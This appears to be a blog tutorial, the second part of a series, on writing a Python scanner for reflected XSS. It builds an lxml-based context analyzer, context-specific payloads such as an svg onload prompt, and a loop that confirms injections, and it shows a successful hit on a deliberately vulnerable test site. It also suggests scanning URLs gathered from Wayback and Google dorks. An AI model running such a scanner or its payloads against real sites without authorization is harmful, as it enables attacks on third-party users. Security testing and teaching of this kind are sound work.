Writing a scanner to find reflected XSS vulnerabilities — Part 2

Hungrysoul
4 min read · Apr 27, 2020


In my previous blog post, we learned how to write a request parser and an initial prober. In this post, we will write the rest of the modules to create a working XSS scanner.

Building a context analyzer is the most difficult part, but once we know exactly how it should work, it gets a bit easier.

Types of XSS reflections and their escapes

HTML Tags: the < and > characters are required to construct a payload.

HTML Attribute Name: a space and = are required; " and ' are optional.

HTML Attribute Value: a direct payload works, or " or ' is required to escape the value and construct a payload.

HTML Text Node: the < and > characters are required to escape the enclosing element (for example, a textarea) and construct a payload.

HTML Comments: the <, >, and ! characters are required to escape the comment and construct a payload.

Style: the < and > characters are required to escape the style element and construct a payload.

Style Attribute: the <, >, and " characters are required to escape the attribute and construct a payload.

Href Attribute: a direct payload works, or " is required to escape the attribute and construct a payload.

JS Node: < and > are required to escape the script element, or other special characters are needed to escape a JS variable or function.

Note: we are not building an advanced scanner to cover all contexts.
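The list above can be turned into a small lookup table. The sketch below is only an illustration: the context names and the escapable_contexts helper are made up for this example, and the attribute name, attribute value, and href contexts are left out because their requirements are conditional. It reports which contexts could be escaped, given the text a server reflected back.

```python
# Characters needed to break out of each context, taken from the list above.
# The dictionary keys are hypothetical names chosen for this sketch.
REQUIRED_CHARS = {
    "html_tag": "<>",
    "html_text": "<>",
    "html_comment": "<>!",
    "style": "<>",
    "style_attribute": '<>"',
    "js": "<>",
}


def escapable_contexts(reflected):
    """Return the contexts whose required characters all came back unencoded."""
    return [
        name
        for name, chars in REQUIRED_CHARS.items()
        if all(char in reflected for char in chars)
    ]


print(escapable_contexts("a<b>c"))      # < and > survived the round trip
print(escapable_contexts("&lt;&gt;"))   # everything was HTML-encoded
```

If the server HTML-encodes the angle brackets, none of these contexts can be escaped, which is why the prober has to check what actually comes back.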

To write a context analyzer, we are going to use a package called lxml, which parses HTML into an XML tree.

pip3 install lxml

We will write a class that takes in a raw HTML response, converts it into an XML tree, searches for a string, and then returns a list of contexts.

For example, execute the following code:

from lxml import html

string = "<html><body><h1>teyascan</h1></body></html>"
search_string = "teyascan"
page_html_tree = html.fromstring(string)
# Match any element whose text contains the search string
xpath = "//*[contains(text(), '" + search_string + "')]"
n = page_html_tree.xpath(xpath)
if len(n):
    print("INPUT IS REFLECTED BACK INSIDE HTML TAG CONTEXT")

You will see output like the following:

(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
INPUT IS REFLECTED BACK INSIDE HTML TAG CONTEXT

In the above code, you can see that a raw HTML string is parsed and converted into an XML tree. We then search the tree with an XPath expression to find the context in which the string has been reflected.
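The same idea extends to other contexts by running one XPath expression per context. The following is a minimal sketch under stated assumptions, not the analyzer used in this series: the XPath expressions and the context names (apart from "text", which appears in the output further down) are assumptions, and the probe is assumed to contain no single quote.

```python
from lxml import html


class ContextAnalyzer:
    """Illustrative sketch: classify where a probe string is reflected."""

    # One XPath template per context; %s is replaced by the quoted probe.
    CHECKS = {
        "script": "//script[contains(., %s)]",
        "style": "//style[contains(., %s)]",
        "attribute_value": "//@*[contains(., %s)]",
        "comment": "//comment()[contains(., %s)]",
        "text": "//*[not(self::script or self::style)]/text()[contains(., %s)]",
    }

    @staticmethod
    def get_contexts(response_text, probe):
        tree = html.fromstring(response_text)
        quoted = "'" + probe + "'"  # assumes the probe has no single quote
        contexts = []
        for name, template in ContextAnalyzer.CHECKS.items():
            count = len(tree.xpath(template % quoted))
            if count:
                contexts.append({"type": name, "count": count})
        return {"payload": probe, "contexts": contexts}


page = (
    "<html><body><h1>teyascan</h1>"
    "<a href='/q?teyascan'>x</a>"
    "<script>var a = 'teyascan';</script></body></html>"
)
print(ContextAnalyzer.get_contexts(page, "teyascan"))
```

Keeping the checks in a dictionary makes it easy to add a context later without touching the loop.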

Here is the full code that covers most of the contexts.

Note: The above code is heavily inspired by an open-source project whose name I don't remember.

Save the code as context_analyzer.py and execute it

(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
{'payload': 'teyascan', 'contexts': [{'type': 'text', 'count': 1}]}
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>

Great! Now we have successfully created a context analyzer. All that is left is to create payloads based on the context and confirm those payloads.

For this part, we will not use a static list of payloads; instead, we will make the scanner smart enough to pick payloads based on the context.

Start by creating a new file called payload_generator.py and create a function called payload_generator in it. The function takes a context type and returns a list of dictionaries, each holding a payload and the XPath expression used to find that payload in the XML tree.
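A minimal sketch of such a function is shown below. It is an assumption-laden illustration rather than the original listing: the return shape and the "htmltag" and "text" context names come from the outputs in this post, while the random marker range and the "attribute_value" branch are assumptions.

```python
import random


def payload_generator(context_type):
    """Return payload/XPath pairs for one reflection context (illustrative only)."""
    # A random marker makes it unlikely that the XPath matches unrelated content.
    marker = str(random.randint(100000, 999999))
    find = "//svg[@onload[contains(.,%s)]]" % marker
    payloads = []
    if context_type in ("htmltag", "text"):
        # Reflection between tags: a new element can be injected directly.
        payloads.append({"payload": "<svg onload=prompt`%s`>" % marker, "find": find})
    elif context_type == "attribute_value":  # hypothetical context name
        # Reflection inside a quoted attribute: close the quote and the tag first.
        payloads.append({"payload": "\"><svg onload=prompt`%s`>" % marker, "find": find})
    return payloads


print(payload_generator("htmltag"))
```

Pairing each payload with its own XPath keeps the confirmation step generic: the scanner only has to run the "find" expression against the parsed response.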

Execute the following code:

# RequestParser, GetInsertionPoints and send_request come from Part 1
from context_analyzer import ContextAnalyzer
from payload_generator import payload_generator

with open("requests.txt", "rb") as f:
    parser = RequestParser(f.read())
i_p = GetInsertionPoints(parser.request)

for request in i_p.requests:
    response = send_request(request, "http")
    if "teyascan" in response.text:
        print("probe reflection found in "+request.insertion)
        contexts = ContextAnalyzer.get_contexts(response.text, "teyascan")
        final_payloads = []
        for context in contexts["contexts"]:
            print(context)
            payloads = payload_generator(context['type'])
            final_payloads.extend(payloads)
        print(final_payloads)

The output would be:

(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
{'type': 'htmltag', 'count': 1}
[{'payload': '<svg onload=prompt`812132`>', 'find': '//svg[@onload[contains(.,812132)]]'}]

AWESOME! We have successfully created a payload based on the context. The next step is to send a request with the payload and confirm whether the payload succeeds.

To do that we need to send an HTTP request, but this time instead of the probe string we send it with the payload. We start by copying the request using deepcopy.

import copy

dup = copy.deepcopy(request)

Then we replace "teyascan" in the request params, headers, and body using:

def replace(request, string, payload):
    # str.replace returns a new string, so the result has to be stored back
    request.headers = {
        k.replace(string, payload): v.replace(string, payload)
        for k, v in request.headers.items()
    }
    for k, v in request.params.items():
        request.params[k] = v.replace(string, payload)
    for k, v in request.data.items():
        request.data[k] = v.replace(string, payload)
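To see why the copy matters, here is a small self-contained sketch. The FakeRequest class and the example.test URL are hypothetical stand-ins for the request object built in Part 1; only the headers, params, and data attributes are assumed to exist.

```python
import copy


class FakeRequest:
    """Hypothetical stand-in for the request object from Part 1."""

    def __init__(self, headers, params, data):
        self.headers = headers
        self.params = params
        self.data = data


def replace(request, string, payload):
    # Strings are immutable, so every replaced value is written back.
    request.headers = {
        k.replace(string, payload): v.replace(string, payload)
        for k, v in request.headers.items()
    }
    request.params = {k: v.replace(string, payload) for k, v in request.params.items()}
    request.data = {k: v.replace(string, payload) for k, v in request.data.items()}


original = FakeRequest(
    headers={"Referer": "http://example.test/?q=teyascan"},
    params={},
    data={"searchFor": "teyascan", "goButton": "go"},
)
dup = copy.deepcopy(original)
replace(dup, "teyascan", "<svg onload=prompt`1`>")

print(dup.data["searchFor"])       # the copy now carries the payload
print(original.data["searchFor"])  # the original still carries the probe
```

Because the probe request stays untouched, it can be reused for every payload in the list.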

Once that is done, we can send the request object using the send_request function we created in Part 1.

import copy
from lxml import html

with open("requests.txt", "rb") as f:
    parser = RequestParser(f.read())
i_p = GetInsertionPoints(parser.request)

for request in i_p.requests:
    response = send_request(request, "http")
    if "teyascan" in response.text:
        print("probe reflection found in "+request.insertion)
        contexts = ContextAnalyzer.get_contexts(response.text, "teyascan")
        for context in contexts["contexts"]:
            print(context)
            payloads = payload_generator(context['type'])
            for payload in payloads:
                # Work on a copy so the original probe request stays intact
                dup = copy.deepcopy(request)
                replace(dup, "teyascan", payload['payload'])
                response = send_request(dup, "http")
                page_html_tree = html.fromstring(response.text)
                # A match means the payload came back as a real element
                count = page_html_tree.xpath(payload['find'])
                if len(count):
                    print("request vulnerable")
                    print(dup.headers)
                    http = MakeRawHTTP(dup)
                    print(http.rawRequest)

The output would be:

(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
VULNERABLE TO XSS
POST /search.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://testphp.vulnweb.com
Connection: close
Referer: http://testphp.vulnweb.com/search.php?test=query
Upgrade-Insecure-Requests: 1
searchFor=asdas <svg onload=prompt`812132`>&goButton=go&

Repeating the request in a browser confirms the vulnerability.

TADAAA! We have successfully automated finding XSS.
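The confirmation step at the heart of the loop can also be tried in isolation, without sending any request. In the sketch below, the is_payload_reflected helper and the two sample responses are made up for illustration; the payload and XPath are the ones from the output shown earlier.

```python
from lxml import html


def is_payload_reflected(response_text, find_xpath):
    """Return True if the payload was parsed as a real element in the response."""
    tree = html.fromstring(response_text)
    return len(tree.xpath(find_xpath)) > 0


payload = {
    "payload": "<svg onload=prompt`812132`>",
    "find": "//svg[@onload[contains(.,812132)]]",
}

# Hypothetical responses: one reflects the payload raw, one HTML-encodes it.
raw = "<html><body><h2>searched for: %s</h2></body></html>" % payload["payload"]
encoded = (
    "<html><body><h2>searched for: "
    "&lt;svg onload=prompt`812132`&gt;</h2></body></html>"
)

print(is_payload_reflected(raw, payload["find"]))
print(is_payload_reflected(encoded, payload["find"]))
```

Checking the parsed tree instead of doing a plain substring search avoids false positives when the server encodes the payload, since an encoded payload ends up as text rather than as an svg element.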

The tutorial code can be found at https://github.com/akhil-reni/xsstutorial

The scanner can be customized for various use cases, such as:

  • Scraping URLs from Wayback and scanning for XSS
  • Scraping Google with dorks and scanning for XSS


Hungrysoul

Python Dev, Part time Bug Bounty Hunter & a Full time entrepreneur.